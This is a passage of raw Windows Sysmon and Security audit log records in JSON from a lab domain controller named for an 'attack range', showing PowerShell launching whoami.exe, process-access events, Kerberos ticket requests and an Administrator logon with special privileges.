assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a85096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fbaae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fba0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","SourceProcessId":"4444","SourceThreadId":"4616","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010B29E0400}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98b32ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a85096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f94817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97ff2ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fc8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd4287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a85096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fbaae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fba0b2(wow64)","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010B29E0400}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010B29E0400}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-0010446C0400}\r\nSourceProcessId: 4344\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010B29E0400}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-0010446C0400}","SourceProcessId":"4344","SourceThreadId":"4364","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010B29E0400}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:47:10.422\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nProcessId: 1224\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{2E4B67D4-08D6-4870-BF35-8090C0556891}\\DateLastConnected\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.422","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{2E4B67D4-08D6-4870-BF35-8090C0556891}\\DateLastConnected","Details":"Binary Data","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220365,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48096\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48096","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.422\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.422","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220366,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220367,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220368,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220369,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A0BF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4a0bf","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220370,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A0BF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4a0bf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.422\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 